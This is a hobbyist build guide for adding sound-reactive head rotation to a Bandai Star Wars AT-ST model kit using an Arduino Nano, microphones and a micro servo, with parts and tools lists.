package todo.ui; import java.awt.Component; import java.util.Iterator; import java.util.List; import javax.swing.BoxLayout; import javax.swing.JPanel; public class BoxLayoutPanel extends JPanel { /** * We can't use "components" as the property name, * because it conflicts with an existing property * on the Component superclass. */ private List panelComponents; private int axis; public void setAxis(int axis) { this.axis = axis; } public void setPanelComponents(List panelComponents) { this.panelComponents = panelComponents; } public void init() { setLayout(new BoxLayout(this, axis)); for (Iterator iter = panelComponents.iterator(); iter.hasNext();) { Component component = (Component) iter.next(); add(component); } } }
As you can see in Listing 13, the
axis(X/Y) property of the
BoxLayout is settable with a
setAxis() method. The panel has a List of
Components, which will be automatically added to the panel when it is initialized. The code to set up the
BoxLayout and add the
components to the panel are in an
init() method that Spring calls when the bean is created, just like the
MainFrame bean.
Wiring beans together
Now, you need to wire the panel into Spring and provide a component to add to it, so you'll modify app-context.xml as in Listing 14 (by adding the boldfaced elements):
Listing 14. src/todo/app-context.xml - Wiring the BoxLayoutPanel into Spring
<bean id="mainFrame" class="todo.ui.MainFrame" init- <property name="contentPane"> <ref bean="mainPanel"/> </property> <property name="title"> <value>My To Do List</value> </property> </bean> "/> </list> </property> </bean> <bean id="itemScrollPane" class="javax.swing.JScrollPane"> </bean>
There are a few things to notice in Listing 14. First, you create the
mainPanel bean much like the
mainFrame bean. Then, you inject it into the
mainFrame bean, by using the
contentPane property and
<ref bean="mainPanel"/>.
setContentPane() is a method to add a panel to a frame. It is available to you automatically, because
MainFrame subclasses
JFrame and therefore inherits the
setContentPane() method.
<ref bean="mainPanel"/> simply takes the
mainPanel object that Spring creates and passes it to the
setContentPane() method on
MainPanel.
You also inject values into the
axis and
panelComponents properties of
BoxLayoutPanel. For
axis, the
1 corresponds to the
Y_AXIS constant of
BoxLayout. (Note that Spring does provide a way to set a bean property from a static field value, by using a FieldRetrievingFactoryBean. But I don't want to get too fancy, so you'll just hard-code the value of the
axis constants.)
The
panelComponents property takes a
List, so you use the
<list> element to make Spring automatically create an
ArrayList for you. Spring can automatically create the following collection types:
List,
Set,
Map, and
Properties.
Finally, you defined a third bean,
itemScrollPane, which is a JScrollPane, so that you have a
Component in your
List.
itemScrollPane doesn't require any custom code, so you don't even need to subclass
JScrollPane; you just let Spring instantiate it directly. See how you can use Spring to wire together instances of preexisting classes that know nothing about Spring, using their existing methods?
Run the application, and you should see ... pretty much the same thing you saw before. Even though you added a
Panel and a
ScrollPane, Swing doesn't show scrollbars unless there is something to scroll. You'll add a component to the
ScrollPane in the next section. Bear with me -- this will be a fully functional application, once you get through some of these inevitable boring bits.
Adding a table and reusing the panel
Next, you'll add a JTable named
itemTable to the existing
itemScrollPane. You'll also place another
BoxLayoutPanel, named
buttonPanel, in the existing
mainPanel. This gives you a panel to hold the buttons. This time, you aren't writing any new Java code, but you are just defining and wiring together more beans in app-context.xml, using existing classes (see Listing 15):
Listing 15. src/todo/app-context.xml - Reusing BoxLayoutPanel
"/> <ref bean="buttonPanel"/> </list> </property> </bean> <bean id="itemScrollPane" class="javax.swing.JScrollPane"> <constructor-arg> <ref bean="itemTable"/> </constructor-arg> </bean> <bean id="itemTable" class="javax.swing.JTable"> </bean> <bean id="buttonPanel" class= "todo.ui.BoxLayoutPanel" init- <property name="axis"> <!-- "0" corresponds to BoxLayout.X_AXIS --> <value>0</value> </property> <property name="panelComponents"> <list> </list> </property> </bean>
Remember how you made the
BoxLayoutPanel generic so you could reuse it (see Creating a reusable panel)? The
buttonPanel is an instance of
BoxLayoutPanel just like
mainPanel. However, it holds buttons instead of a scroll pane, and it will lay out along the X axis rather than the Y axis -- but this is all configured via Spring, so you don't need to change the code. Reuse without needing to change code is good!
Take a minute to think about how you made the
BoxLayoutPanel reusable. First, you were careful of your dependencies. The only requirements of the
BoxLayoutPanel interface are the
axis value and a
List of
Components. (Almost every Swing GUI element inherits from
Component.) You could have originally created a
ScrollPaneAndButtonPanePanel and had specific
setScrollPane and
setButtonPane setters for each of those components, but that wouldn't have been very reusable at all. Instead, you just took a generic
List of
Components and iterated over it (facilitated by BoxLayout's linear layout scheme). This means that this pane can be reused to lay out any number of GUI components in a vertical or horizontal line, and it never needs to know what type of components they are. This illustrates the good programming practices of low coupling and high cohesion in action (see Resources). Your
BoxLayoutPanel lays out components in a row or column, does it very well, and doesn't do anything else (high cohesion). And, it neither knows nor cares about what it lays out, other than the fact that it is a
List of
Components (low coupling).
Another interesting addition to app-context.xml in Listing 15 is the use of the
<constructor-arg> element. This is constructor injection, as opposed to setter injection, which you've been using so far. This sounds kind of complex, but it's really not. You are just passing in (injecting) your dependency through a constructor argument, rather than a setter (accessor) method argument. The only reason you use it here is that
JScrollPane lets you add a component only through the constructor; you can't add it through a setter.
Run the application, and you should see -- nothing again. Don't despair -- I promise something more exciting will happen very soon.
To summarize, you now have
MainFrame, which contains a
BoxLayoutPanel. The
BoxLayout panel contains a
JScrollPane with an empty
JTtable, and another
BoxLayoutPanel for the soon-to-be-added buttons. However, because these are all container-type components that don't contain anything, they all just show up as a big gray box. But now that all that plumbing is out of the way, you can add some goodies to create something much more exciting.
Defining a table model
In the next section (Creating the to-do list: Finishing up -- buttons and listeners), you'll display some items in the to-do list. To accomplish this, you first need to create an implementation of TableModel, which you'll set on your
JTable. Your
TableModel implementation will be called
ItemTableModel, and it will simply be a wrapper for a
List of items. To make this easier, you'll extend the AbstractTableModel abstract class provided by Swing and override only the methods you need to in order to make your
TableModel behave properly when you add it to the
JTable. Listing 16 shows the code for
ItemTableModel:
Listing 16. src/todo/ui/ItemTableModel.java
package todo.ui; import java.util.List; import javax.swing.table.AbstractTableModel; public class ItemTableModel extends AbstractTableModel { List itemList; public boolean isCellEditable(int rowIndex, int columnIndex) { return true; } public int getColumnCount() { return 1; } public String getColumnName(int column) { return "Items"; } public void setItemList(List itemList) { this.itemList = itemList; } public int getRowCount() { return itemList.size(); } public void setValueAt(Object value, int rowIndex, int columnIndex) { itemList.set(rowIndex, value); } public Object getValueAt(int rowIndex, int columnIndex) { return itemList.get(rowIndex); } }
The methods in
ItemTableModel are fairly straightforward and self-explanatory. Cells are always editable. (
isCellEditable() always returns true.) The table has only one column. The row count is always equal to the list size. The
setValueAt() and
getValueAt() methods simply access the element in the underlying list at the specified row index. The
columnIndex parameter can be ignored because the table has only one column. Finally, there are the property and setter for the
itemList itself. That's all there is to the class. Save it and make sure it compiles. No need to run the application yet because you haven't yet wired the
ItemTableModel class into the rest of the application.
Showing items in the list
You might be wondering where the
List of items will come from. That is a very important question, and the very important answer is: You don't care at this point. Right now, the only dependency that your
TableModel has on the data is that it implements the
List interface. This means that it could come from anywhere -- a database, a network request, or a simple hard-coded
ArrayList. (You'll use a simple
ArrayList.) It doesn't matter, as long as you put the data into some class that implements the
List interface and inject it into your
TableModel. This is good for a few reasons:
- You can finish coding and testing your list-display GUI functionality against a simple hard-coded list, and put off until later the details such how you will store the list or retrieve stored lists.
- The "real" implementation of your list could be developed by someone else, in a completely different project, with his or her own Spring configuration file, and you could still wire it together with your GUI later to make a single application. Spring lets you have multiple app-context bean definition files.
- If you do want to add fancy stuff later to your list implementation, such as database persistence (JDBC or ORM) or remote access (Spring supports several different remoting technologies), you can. The Spring framework is filled with lots of helper and wrapper classes for services such as these, as well as examples of how to use them. This can make your development effort much easier (and require much less code) than if you had to use the APIs of the services directly. And the Spring wrappers are designed to be loosely coupled and reusable just like the beans in your to-do list application.
- Even if you eventually do write a real implementation of the list, you can still plug in a stub implementation at any time it is convenient -- for example, during tests, when you don't want to incur the overhead of a database hit, or when you want to have complete and easy control over the list's behavior (see Resources for more on test-driven development).
But enough with the gratuitous gushing. Back to the code. It's time to make the stub list implementation and wire it up with your
TableModel and
JTable. The define-and-inject pattern for configuring beans in the Spring app-context.xml configuration file should start becoming more familiar by now (see Listing 17):
Listing 17. src/todo/app-context.xml - Adding a stub list implementation
<bean id="itemTable" class="javax.swing.JTable"> <property name="model"> <ref bean="itemTableModel"/> </property> </bean> <bean id="itemTableModel" class="todo.ui.ItemTableModel"> <property name="itemList"> <ref bean="itemList"/> </property> </bean> <bean id="itemList" class="java.util.ArrayList"> <constructor-arg> <list> <value>Item 1</value> <value>Item 2</value> <value>Item 3</value> </list> </constructor-arg> </bean>
Now, run the application, and you should see your data in the list, as shown in Figure 4:
Figure 4. A list with data in it
The list is even editable, because you always return true from
isCellEditable. Try it: just click in a cell and type or delete characters. When you get bored with that, move on to the next section, where you'll add buttons for adding and deleting items from the list.
Creating the to-do list: Finishing up with buttons and listeners
You'll finish writing your to-do list application in this section. You'll create buttons and listeners that let you add and delete items from the list. The section also includes some discussion about how your button and listener code is different from most other Swing sample code or tutorials.
Creating buttons and listeners
You're in the home stretch now. All you need to do is create Add New and Delete buttons and hook them up to the list using events and listeners. This is all fairly basic stuff in Swing/Java programming (see Resources for good examples and tutorials on these topics), so I'll cover it pretty quickly -- especially because the Spring wiring code is pretty similar to what you've already seen. The classes you'll create to make the buttons work use Swing's implementation of the Observer pattern. If you don't understand that pattern you might get a bit confused; see Resources for more information on the Observer pattern.
First, create a subclass of JButton called
ActionListenerButton, which you'll use for both the Add New and Delete buttons (see Listing 18):
Listing 18. src/todo/ui/button/ActionListenerButton.java
package todo.ui.button; import java.awt.event.ActionListener; import javax.swing.JButton; public class ActionListenerButton extends JButton { private ActionListener actionListener; public void setActionListener(ActionListener actionListener) { this.actionListener = actionListener; } public void init() { this.addActionListener(actionListener); } }
The
ActionListenerButton class has a property to hold an
ActionListener, and an
init() method (called by Spring upon bean creation) that adds the
ActionListener to the button. This class plays the role of the subject in the Observer pattern, and it will notify its
ActionListener when clicked. Notice that
ActionListenerButton is in a new
todo.ui.button package.
Next, create an abstract superclass called
ListTableActionListener, which contains the common functionality of the ActionListeners for your buttons. This common functionality is the existence of properties for the
list and
table, which the subclasses will access and modify when their
actionPerformed() methods are invoked. The subclasses of
ListTableActionListener act as the observers in the Observer pattern. Listing 19 shows the code for
ListTableActionListener:
Listing 19. src/todo/ui/button/ListTableActionListener.java
package todo.ui.button; import java.awt.event.ActionListener; import java.util.List; import javax.swing.JTable; public abstract class ListTableActionListener implements ActionListener { protected JTable table; protected List list; public void setList(List list) { this.list = list; } public void setTable(JTable itemTable) { this.table = itemTable; } }
Next, create
AddNewButtonActionListener, shown in Listing 20:
Listing 20. src/todo/ui/button/AddNewButtonActionListener
package todo.ui.button; import java.awt.event.ActionEvent; public class AddNewButtonActionListener extends ListTableActionListener { public void actionPerformed(ActionEvent e) { list.add("New Item"); table.revalidate(); } }
AddNewButtonActionListener adds a new default item to the list when
actionPerformed() is invoked and calls
table.revalidate() to make the table display the newly inserted data.
Finally, create
DeleteButtonActionListener, shown in Listing 21:
Listing 21. src/todo/ui/button/DeleteButtonActionListener
package todo.ui.button; import java.awt.event.ActionEvent; public class DeleteButtonActionListener extends ListTableActionListener { public void actionPerformed(ActionEvent e) { int selectedRow = table.getSelectedRow(); if (selectedRow == -1) { // if there is no selected row, don't do anything return; } if (table.isEditing()) { // if we are editing the table, don't do anything return; } list.remove(selectedRow); table.revalidate(); } }
This
ActionListener gets the index of the currently selected row, if there is one, and removes the corresponding item from the list if the row is not currently being edited. After removing the item, the table is revalidated to display the changes.
Wiring in the buttons and listeners
Now that you have the code for the buttons and
ActionListeners, you wire them together with Spring, just like the other beans, in the app-context.xml file (see Listing 22):
Listing 22. src/todo/app-context.xml - Wiring in the buttons and listeners
<bean id="buttonPanel" class="todo.ui.BoxLayoutPanel" init- <property name="axis"> <!-- "0" corresponds to BoxLayout.X_AXIS --> <value>0</value> </property> <property name="panelComponents"> <list> <ref bean="deleteButton"/> <ref bean="addNewButton"/> </list> </property> </bean> <bean id="deleteButton" class="todo.ui.button.ActionListenerButton" init- <property name="actionListener"> <ref bean="deleteButtonActionListener"/> </property> <property name="text"> <value>Delete</value> </property> </bean> <bean id="deleteButtonActionListener" class="todo.ui.button.DeleteButtonActionListener"> <property name="list"> <ref bean="itemList"/> </property> <property name="table"> <ref bean="itemTable"/> </property> </bean> <bean id="addNewButton" class="todo.ui.button.ActionListenerButton" init- <property name="actionListener"> <ref bean="addNewButtonActionListener"/> </property> <property name="text"> <value>Add New</value> </property> </bean> <bean id="addNewButtonActionListener" class="todo.ui.button.AddNewButtonActionListener"> <property name="list"> <ref bean="itemList"/> </property> <property name="table"> <ref bean="itemTable"/> </property> </bean>
You now have two button beans,
addNewButton and
deleteButton, both of which are instances of
ActionListenerButton. Two
ActionListener beans (
deleteButtonActionListener and
addNewButtonActionListener) are defined. They each have the
list and
table injected into them and are in turn injected into the buttons. The button beans themselves are added to the
buttonPanel bean's list of components, so it will lay them out. Note that both the
deleteButtonActionListener and
addNewButtonActionListener beans have the same Singleton instances of the
list and
table beans injected into them. This means that they will both modify the same
list and
table objects.
That's it! Compile and run, and you should see something similar to Figure 5:
Figure 5. The completed To Do List application
Try out the Add New and Delete buttons. Make sure you try adding enough rows and/or resizing the window so that you can see the scrollbar working. You now have a fully functional, rich-client application, written using Spring and Swing. There are a few bugs hiding in it, resulting from this simple implementation. You get extra credit if you find them, and double extra credit if you fix them. If you want to see a much more production-quality example of a Swing application written using Spring, continue on to the next section and check out the Spring Rich Client Project.
The Spring Rich Client Project
This section introduces you to the Spring Rich Client Project (RCP). Although it is still in prerelease development at the time this tutorial is being written, it is a very interesting example of Spring being used to build sophisticated Swing applications.
A slightly higher skill level is required for this section because you'll need to obtain and run (and possibly build) the project yourself. Currently, JDK 1.5 is required to run the sample application. Also, be aware that latest source might have some temporary problems building or running because it is in still active development.
Spring Rich Client Project overview
The main Spring framework project has a subproject called The Spring Rich Client Project. It is hosted as a SourceForge project and has an active mailing list (see Resources). Although this project is still in a prerelease stage and undergoing architectural changes, it is functional and usable.
The Spring RCP is a good example of the Spring framework's flexibility and of the way Spring provides building blocks that can be used as a foundation for more complex applications and frameworks. It is a basic framework for building Swing-based GUI applications. By providing high-level abstractions such as commands, lifecycle, rules, wizards, forms, views, and preferences, it lets you create nice-looking GUI components and event handling without too much low-level code. A "Petclinic" sample application bundled with the RCP serves as a good example.
At the time this tutorial is being published, no distributed release package of Spring RCP is available. Recent copies of the RCP binaries and source are available at a hosting site (see Resources). If you can't get it there, or you want the latest source, you need to check it out from the Spring RCP CVS repository and build it.
To get the RCP source from CVS, visit the CVS page for the RCP on SourceForge, and check out the HEAD (see Resources). If you don't know how to use CVS, you can visit the CVS home page and/or download a GUI CVS client such as TortoiseCVS or Cervisia (see Resources). If you use Eclipse, then you can use the CVS Repository Exploring perspective to check out the code.
Once you have the code checked out, find the Ant script at samples/petclinic/build.xml and run the
build-standalone target. Then run the commands in samples/petclinic/bin/petclinic-standalone.bat. If you have problems and you checked out the source, you might need to rebuild using the
clean and
alljars targets in the main build.xml in project's root. If you use Eclipse, run samples/petclinic/src/ -> org.springframework.richclient.samples.petclinic.PetClinicStandalone.
When you run the application, you should get a wizard and then a login screen. Enter any ID and password and click on Cancel to get into the application, as shown in Figure 6:
Figure 6. The Spring Rich Client Project Petclinic sample application
Play around with the application a bit and then look into the Petclinic sample source code to see how it works. Even if you don't use the RCP directly, the code can provide you with ideas for designing your own rich-client GUIs using Spring. The RCP and the bundled sample applications also provide good examples of how to use the services provided by the core Spring framework, including event handling, remoting with Hessian, JDBC datasource access, and transaction management with AOP. Just as in your to-do list application, the XML context files are a good starting place to learn how a Spring application is put together.
Summary
In this tutorial, you created a Swing GUI application from scratch, using the Spring framework. You learned about the use and benefits of Spring and about dependency injection. And you learned a bit about good programming practices, such as creating reusable components, and the benefits of loose coupling and high cohesion. You also took a look at the Spring Rich Client Project, which is an example of a framework to support the construction of Swing-based GUI applications using Spring. To learn more, try using Spring out on your next or current project. As you can see from this tutorial, it's easy to learn and use the basics.
Also, using Spring is noninvasive, so you could easily use it in a new module of an existing application without affecting the rest of the application. If you can create an
ApplicationContext and get beans from it, then you can use Spring to wire your objects together. Even if you don't care about using dependency injection for your application right now, you can still use the many useful components that are provided as part of the Spring framework.
You don't even need to use an
ApplicationContext if you don't want to. Instead, you can use the helper and wrapper classes from the framework directly, instantiating and wiring them together manually (although this would probably be harder than just configuring and using them through an
ApplicationContext). The point is that you could if you wanted to, because of the flexibility and reusability that are designed into all aspects of Spring.
In my experience, using dependency injection is a very different approach to designing applications. It simplifies many things, and it can cause you to come up with new and different designs that are better than you would have otherwise. It is especially powerful if you use unit testing a lot, because it makes it much easier to write loosely coupled, easily testable units of code. Some of the benefits are subtle and take a while to realize, such as the reduced maintenance required because there is less configuration and wiring code to maintain. Don't take my word for it though -- try it out on a project of your own, and please feel free to let me know how it goes. Thanks for reading this tutorial, and remember that all feedback is welcome!
Download
Resources
Learn
- Spring framework Web site and About Spring: Visit project headquarters for the Spring framework and read the project's mission statement and feature list.
- "What Is Spring, Part 1" and "What Is Spring, Part 2": Excerpts from the book Spring: A Developer's Notebook by Bruce A. Tate and Justin Gehtland (O'Reilly, 2005).
- The Spring series (Naveen Balani, developerWorks, 2005): A series of articles and examples on the Spring framework.
- "Introduction to the Spring framework": Rod Johnson's article discusses using Spring to develop J2EE applications.
- Spring Rich Client Project home page and developers' mailing list: Learn more about the Spring RCP.
- Swing API Javadoc: Complete documentation for all Swing components.
- Creating a GUI with JFC/Swing: A series of Sun tutorials on how to create GUIs using Swing.
- Singleton Pattern and Observer Pattern: Learn about these design patterns.
- TestDriven.com: Test-driven development (TDD) is a powerful development approach that fits well with Spring.
- "Inversion of Control Containers and the Dependency Injection pattern" and Inversion of Control: Good descriptions of DI/IOC by Martin Fowler.
- "A beginners guide to Dependency Injection": A high-level overview of DI.
- Coupling And Cohesion: Learn more about the good programming practices of low coupling and high cohesion.
- Well-Formed XML Documents: Learn what's involved in maintaining well-formed XML.
- Aspect Oriented Programming with Spring: Documentation on Spring's support for AOP.
- You Arent Gonna Need It (YAGNI): A development approach in which you do not code any functionality until it is needed.
- Do The Simplest Thing That Could Possibly Work: A development approach that encourages you to start new code by keeping it simple and getting it running quickly.
- "An inside view of Observer": An article describing how the Observer pattern is used in Swing.
Get products and technologies
- Spring download page: Download the Spring framework.
- Eclipse: Download the Eclipse IDE.
- Apache Ant: Download the Ant build tool.
- Apache Maven: Download the Maven build tool and project-management environment.
- RCP hosting site: Download recent RCP binaries and source.
- CVS page for Spring RCP: Get current RCP source code from the project's CVS repository on SourceForge.
- Concurrent Versions System (CVS): CVS is a popular open-source version-control system.
- TortoiseCVS GUI and Cervisia CVS GUI: GUI CVS clients for Windows and Unix, respectively.
- JUnit: Download the popular unit-testing framework. Spring makes it easy to unit test.
- Jemmy: Jemmy is a tool for doing functional testing of Swing GUI applications.
- jMock: jMock is a library for testing Java code using mock objects. Spring, JUnit, jMock, and test-driven development are a powerful combination for writing robust, bug-free code.. | http://www.ibm.com/developerworks/java/tutorials/j-springswing/j-springswing.html | CC-MAIN-2014-52 | refinedweb | 9,301 | 55.74 |
wctob man page
Prolog
This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
wctob — wide-character to single-byte conversion
Synopsis
#include <stdio.h> #include <wchar.h> int wctob(wint_t c);
Description
The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1-2008 defers to the ISO C standard..
Return Value
The wctob() function shall return EOF if c does not correspond to a character with length one in the initial shift state. Otherwise, it shall return the single-byte representation of that character as an unsigned char converted to int.
Errors
No errors are defined.
The following sections are informative.
Examples
None.
Application Usage
None.
Rationale
None.
Future Directions
None.
See Also
btow
btowc(3p), wchar.h(0p). | https://www.mankier.com/3p/wctob | CC-MAIN-2019-04 | refinedweb | 172 | 52.15 |
Status
()
People
(Reporter: dbaron, Unassigned)
Tracking
Firefox Tracking Flags
(Not tracked)
Details
Attachments
(4 attachments, 1 obsolete attachment)
DESCRIPTION: The change to the new G++ V3 ABI for gcc 3.0 may well break the xptcall code on all platforms where we use gcc. (If the ABI was changed the same way on all platforms, it will.) I just checked in the fix for x86 (see bug 63604), but we probably need similar fixes on other platforms. The fix for x86 involved conditionally ( #if defined(__GXX_ABI_VERSION) && __GXX_ABI_VERSION >= 100 /* G++ V3 ABI */ ) looking for the address of the nth virtual function pointer at (vptr + n*sizeof(void*)) rather than (vptr + (2 + n)*sizeof(void*)).
Theres a patch in bug 101528 for m68k
*** Bug 103887 has been marked as a duplicate of this bug. ***
My experience in 103887 make me think this is broken on Sparc too. I am running 64bit Solaris 8, with gcc 3.0.1 and failed.
I added xptcinvoke code for Solaris/sparc with gcc3 that works for me in TestXPTCInvoke with gcc 3.0.1. I added it as a separate file since there doesn't seem to be a good way to |#if| assembler with gcc (although I could always remove it later). So if you want to test it, just: Index: Makefile.in =================================================================== RCS file: /cvsroot/mozilla/xpcom/reflect/xptcall/src/md/unix/Makefile.in,v retrieving revision 1.53 diff -u -d -u -0 -r1.53 Makefile.in --- Makefile.in 2001/09/06 08:23:09 1.53 +++ Makefile.in 2001/10/10 06:35:38 @@ -250 +250 @@ -ASFILES := xptcinvoke_asm_sparc_solaris_GCC.s xptcstubs_asm_sparc_solaris.s +ASFILES := xptcinvoke_asm_sparc_solaris_GCC3.s xptcstubs_asm_sparc_solaris.s Though we really need to figure out how to let the build system know whether we're using gcc3 (probably via an autoconf test testing using the |#if| above). I also need to get the file I added reviewed. :-)
The necessary change for PPC linux is just (after bug 86446) the following -- I'm not sure how to conditionally build this change for gcc3: Index: xptcinvoke_asm_ppc_linux.s =================================================================== RCS file: /cvsroot/mozilla/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_asm_ppc_linux.s,v retrieving revision 1.4 diff -u -d -u -0 -r1.4 xptcinvoke_asm_ppc_linux.s --- xptcinvoke_asm_ppc_linux.s 2000/01/08 00:30:05 1.4 +++ xptcinvoke_asm_ppc_linux.s 2001/10/11 00:44:08 @@ -88 +87,0 @@ - addi r4,r4,2 # skip first two vtable entries
Created attachment 54195 [details] [diff] [review] build changes needed to build GCC3 version for sparc
Comment on attachment 54195 [details] [diff] [review] build changes needed to build GCC3 version for sparc sr=shaver on this patch. What's with the wonky comment style in the GCC3.s file? Tidy up the XPTC_InvokeByIndex intro comment, and sr=shaver there, too. (My sr is enough for the xptcall stuff to go in, but you'll need at least an irc-nod from cls to land the build-fu.)
Attachment #54195 - Flags: superreview+
Comment on attachment 54195 [details] [diff] [review] build changes needed to build GCC3 version for sparc The AC_SUBST(HAVE_GCC3_ABI) needs to go outside of that GNU_CC if statement. Otherwise, the non-gcc3 builds will set HAVE_GCC3_ABI=@HAVE_GCC3_ABI@ which is enough to trigger your ifdef in the xptcall makefile. Fix that && r=cls
Attachment #54195 - Flags: review+
I just checked in the solaris/sparc patch above. So, does anybody have any bright ideas for how to ifdef within xptcinvoke_asm_ppc_linux.s, or should I just copy the file and make the one line change? (m4 is currently only a build requirement for those who want to rerun autoconf. Are we comfortable changing that for some platforms?)
If you want to #ifdef it, why not just run it through the C pre-processor? We figure out how to do that as part of the configure run, I think.
Created attachment 59277 [details] [diff] [review] Patch that I think worked for ppc/gcc3 except the machine was too slow to really test
Except the one tiny little fact that we don't set CPP. Easily changed though.
Well, CPP was set to gcc -E when I tried it. :-)
This looks to be a problem on OSF alpha as well - however i have no knowledge of alpha asm so i am only going by the comments in the existing asm. I guess I could learn, unless someone else fixes it first.
Created attachment 73845 [details] [diff] [review] Fix for gcc-3 on IRIX After applying a fix for bug 86446, this patch will allow compiling with gcc-3 on IRIX (note: there is a gcc bug that causes an ICE with gcc-3.0.4 and below). Applying this patch WITHOUT applying a fix for bug 86446 will not cause a problem for gcc-2.X builds.
added myself to cc list
Patch 59277 does not seem to work, tried it with patch 53024 with gcc 3.1-prerelease (ppc linux) and got crashing mozillas. Where could I find information about the "new" G++ ABI specifically for powerpc, apart from the gcc sources? Note: __GXX_ABI_VERSION is not defined by cpp, gcc or as, but only when g++ is used, at least with this version of gcc.
Could someone please have a look at the IRIX patch? It needs a review, Thanks!
this'll be an issue for the osx mach-o build when apple releases the next round of dev tools. beard, care to take a look at this since you did the last xptcall for mach-o?
If the ABI changes for darwin are the same as for other platforms, the change will probably just be removing the line: addi r5,r5,8 ; (methodIndex * 4) + 8 from xptcinvoke_asm_ppc_rhapsody.s . The fun part is getting the assembly run through the preprocessor so you can #ifdef it.
Note that attachment 59277 [details] [diff] [review] and attachment 73845 [details] [diff] [review] both have different approaches to ifdef-ing. If the one in the latter patch works for you, then that's probably easier.
I can confirm that Mozilla will not compile with Apple's April Dev Tools (including GCC3.1). I'll post the exact error later.
Can someone please review 73845? Is there any chance this will get checked in soon? Also, it really doesn't seem to depend on 102492 (or is that just me?), and it actually DOES depend on 86446.
Comment on attachment 73845 [details] [diff] [review] Fix for gcc-3 on IRIX >@@ -102,12 +114,16 @@ > lw t0, 0(a0) > addu t0, t1 > #ifdef __GNUC__ >+#if (__GNUC__ == 2) > lh t0, 8(t0) >+ addu a0, a0, t0 > #else >- lw t0, 12(t0) >+ # no change for GCC 3 -- that = this > #endif >- >+#else >+ lw t0, 12(t0) > addu a0, a0, t0 >+#endif > > # get register save area from invoke_copy_to_stack > subu t1, t3, 64 One comment about this change: I don't see how gcc3 even needs the two lines before where you changed the ifdefs -- I don't see any uses of t0 later in the code. It might also be clearer if you just put the whole chunk of code inside of "#if !defined(__GNUC__) || __GNUC__ == 2" rather than changing the gcc vs. native ifdefs to handle gcc3 not doing this-adjustment at all. Other than that these changes make sense to me.
Created attachment 93245 [details] [diff] [review] gcc-3 on IRIX... with suggested improvements
Attachment #73845 - Attachment is obsolete: true
Comment on attachment 93245 [details] [diff] [review] gcc-3 on IRIX... with suggested improvements r=dbaron
Attachment #93245 - Flags: review+
What's the status of this with gcc3 on Mac OS X 10.2? I _know_ we're building Chimera under 10.2 and we want to move to that for the Mozilla mach-o builds.
We should be good on gcc3 on OS X 10.2, barring one problem in asdecode. See bug 153525.
Created attachment 126692 [details] [diff] [review] patch to compile with gcc3 on linux-mips I believe this patch fixes the problem on linux-mips. I have tested it and it now compiles with gcc-3.3. I can't get it to run yet, but this is one step on the way :)
I think that's the name mangling change, there. Do you want to use an ifdef for gcc3 like a lot of the other platforms do?
I'm tempted to close this out, since I'm sure we'd have heard more violent noise if we still didn't work with gcc3 on non-x86 systems. Right? For now, though, to the orphanage.
Assignee: shaver → nobody
Please dont close this... it is not fixed! The patches exist, but are not checked in.
there are patches for this problem for alpha in Gentoo, and for ppc in netbsd. there are probably more Linux patches floating out there as well. This bug has been open for THREE YEARS. someone needs to take ownership of it, and start collecting all the halfass workarounds other ``distros'' have done to work around mozilla's non-support of noti386, and commit them to mozilla.org CVS. Why was this bug not fixed as part of #63604? It is a pretty important one. It seems to have slipped through the cracks.
> Why was this bug not fixed as part of #63604? It is a pretty important one. It seems to have slipped through the cracks. That bug may well have fixed x86/nt, but it has not fixed this one. Please take ownership...! There are several parts to this bug, but all the patches (for at least IRIX, and probably others) are available.
Which patches on this bug have not been checked in? Why have the other patches you mention not been contributed back to the Mozilla project? Where are they available?
93245 for eg is not checked in. It does require a patch from 86446 to also be checked in as well (I'm not withholding patches from you ;-) they are all available). There doesn't seem to be any dependency on 102492 however. There also seems to be outstanding patches for ppc and linux/mips... but I could easily be wrong on those ones.
QA Contact: pschwartau → xpconnect
Any value that this bug may previously have had is gone. Please ping me if there are outstanding xptcall patches that need attention.
Status: NEW → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → WORKSFORME | https://bugzilla.mozilla.org/show_bug.cgi?id=71627 | CC-MAIN-2018-47 | refinedweb | 1,717 | 73.88 |
Introduction: Motorized, Sound Reacting Star Wars At-St Bandai Model, With Arduino.
Made from Star Wars At-St Model from Bandai.
Reacts to sound and turns its head towards it.
Made with Arduino Nano, a 3dprinted custom part, microphones, micro servo.
This instructable is made to share the modifications required to achieve the sound reaction anche head rotation capabilities. Includes Arduino Coding, 3d STL Files for printing necessary parts, and obiouvsly instructions to make it happen. Intentionally it won't focus on painting & weathering process, which is a matter of model making, there also are several resources for this i'll link later on. n c +
Enjoy!
Step 1: Materials
Model Kit
- 1 x AT-ST Walker Star Wars Model Scale 1/48 Model Kit Bandai - On eBay Here - € 33,69
Other Materials
- 1Kg Plaster "scagliola" (for the base) - from the hobby store - 7,10€
- Paint (i painted my model, but this instructable doesn't focus on painting process)
- An Iron Pin (optional)
Electronic parts
- 1 x Stainless DPDT OFF/ON White Led switch - On eBay Here - €6,99
- 2 x Microphone Sound Module for Arduino - On eBay Here - €1,79 x 2
- 1 x "Arduino Nano" or compatible: Nano V3.0 ATmega328 16M 5V - CH340G board - € 2,70 -On eBay Here
- 1 x IDE HDD ATA 40-pin 80-wire Hard Drive Data Ribbon Cable 30cm - Harvested form old PC or On eBay Here - € 4,40
- 2 x Internal audio cable CD / DVD / DVD-RW Drive - Harvested form old PC - or On eBay Here - €3,36 x 2
- 1 x V Battery Clip T-type Snap On Connector (9v) - On eBay Here - € 1,59
- 1 x box holder for 2 AA batteries (3.3v) - On eBay Here - € 1
- 1 x Micro Servo Tower Pro - On eBay Here - € 1,49
- 2 x CARBON RESISTOR 220K OHM 1/4W +/-5% - On eBay Here - < 0.50€
- 2 mt PVC insulated 1.2 mm electric wire - Harvested or On eBay Here < 0.50€
- 1 x LED 5 mm ORANGE On eBay Here - < 0.50€
1 x LED 5 mm Warm White On eBay Here - < 0.50€
TOT 73,28€
Step 2: Tools
Tools for model making
This Instructable is not focused on model making.
Let's list the minimal tools necessary for making a model: On Ebay here
- Plastic Sprue Cutter - for cutting & snipping sprues and parts on plastic kits
- Mini Flat File - for filing and smoothing off burrs or excess material.
- Craft Knife - for cutting out shapes, decals and general craft/hobby tasks.
- Self Healing Cutting Mat - protects work surface
